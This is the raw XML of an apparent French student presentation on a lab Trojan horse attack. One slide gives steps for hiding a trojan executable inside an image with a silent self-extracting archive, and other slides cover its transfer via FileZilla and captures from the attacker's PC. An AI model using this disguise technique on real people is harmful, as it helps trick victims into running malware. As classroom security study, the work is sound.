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8" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="272"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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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C0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4323845"/>
            <a:ext cx="6400800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="1430866"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>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382941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666086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a:xfrm>
            <a:off x="685800" y="379941"/>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819103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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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a:xfrm>
            <a:off x="685800" y="379941"/>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E0669CC5-4580-44F0-B702-75E6DBED3100}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>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2882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a:xfrm>
            <a:off x="685800" y="378883"/>
            <a:ext cx="6991492" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10862452" y="381000"/>
            <a:ext cx="643748" cy="365125"/>
          </a:xfrm>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1030043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CC0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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1646988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CC0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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2545427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C0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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666076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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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CC0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="381000"/>
            <a:ext cx="6991492" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10862452" y="381000"/>
            <a:ext cx="643748" cy="365125"/>
          </a:xfrm>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82344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C0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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3402045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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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C0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="381001"/>
            <a:ext cx="6991492" cy="364065"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10862452" y="381000"/>
            <a:ext cx="643748" cy="365125"/>
          </a:xfrm>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209917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124604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685800" y="3132666"/>
            <a:ext cx="5311775" cy="3086019"/>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6172200" y="3132666"/>
            <a:ext cx="5334000" cy="3086019"/>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CC0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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191043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C0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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1055887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0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022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2717505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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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2931940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CC0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022</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0669CC5-4580-44F0-B702-75E6DBED3100}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2392093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0A5FC1-1AB5-4CB3-ABE3-BB4A52AA27E2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>25/01/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>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0669CC5-4580-44F0-B702-75E6DBED3100}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10901504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latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CHEVAL DE TROIE </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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27457" t="21164" r="34045" b="30583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8258628" y="1061324"/>
            <a:ext cx="3817257" cy="3309257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095272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1352283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3137354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1019373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0232" y="2193925"/>
            <a:ext cx="4871536" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189258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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pour attacher le trojan à l’image il a suffit de :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dans la zone "Options d'archivage", cochez l'option : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Créer une archive SFX</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dans l'onglet "Avancé", cliquez sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Options SFX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, et rendez-vous dans l'onglet "Setup"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dans la zone de texte Lancer après extraction, entrez le nom de fichier de votre image, puis le nom du fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>exécutable du trojan</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Les noms de fichier doivent être séparés par des sauts de ligne</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rendez-vous ensuite dans l'onglet "Modes", et sélectionnez l'option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Tout masquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> qui se trouve tout en bas de la fenêtre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="737824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latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Moyen de transfert du virus(Filezilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82"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125" y="2193925"/>
            <a:ext cx="5365750" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1337054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27829" y="938544"/>
            <a:ext cx="8610600" cy="1293028"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Attaque réussie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>(table ARP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82"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7550" y="2405744"/>
            <a:ext cx="8453699" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18309549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latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>FICHIERS SYSTEME</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82"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2823762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latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>INFORMATION RESEAU</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82"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653357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latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CAPTURE PRISE DEPUIS LE PC DU PIRATE</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82"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125" y="2193925"/>
            <a:ext cx="5365750" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256359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dirty="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CHEVAL DE TROIE </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Réalisée par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>NOUGBODE M. F. Anaël</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>SYLLA MAMADI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Sous la supervision de:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Mr GHOLAMI Khalid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104318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effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CONCLUSION</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Nous comprenons à travers cette petite expérimentation que infiltrer un ordinateur est des plus facile quand la cible n’est pas protégé notamment quand les mises à jour ne sont pas régulièrement appliquées. Mais il n’est pas impossible pour un pirate expérimenté de le faire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>même </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>si les protections sont actives. Les possibilités sont énormes avec un tel type d’attaque (vol de données, usurpation d’identité, espionnage, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193655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ormAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="10000" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="10000" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRP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r="2640" b="6310"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667250" y="4206622"/>
            <a:ext cx="2782062" cy="1499234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3183794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INTRODUCTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>nos jours être victime d’une attaque quelque soit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>est quelque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>chose d’assez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>commun que nous rencontrons chez la plupart des gens. La réussite de la plupart de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>celles-ci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sont souvent dû à la négligence des mesures de sécurité, l’inattention en cliquant sur un lien douteux, le téléchargement de logiciel ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>fichier malveillant pas vérifié (source inconnu), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>etc…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712810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BUT DU PROJET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ce projet consiste à réaliser une attaque de cheval de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Troie. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Nous rappelons qu’un cheval de Troie informatique est un programme d'apparence inoffensive, mais qui contient un logiciel malveillant installé par l'utilisateur lui-même, ignorant qu'il fait pénétrer un intrus malveillant sur son ordinateur. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>effet le but de ce projet est de pénétrer dans le PC de la cible sans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>qu’elle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ne s’en rende compte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>. Mais nous mettrons plus dans un contexte d’expérimentation qui vise à appliquer les notions de recherches et celles vues en classe.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
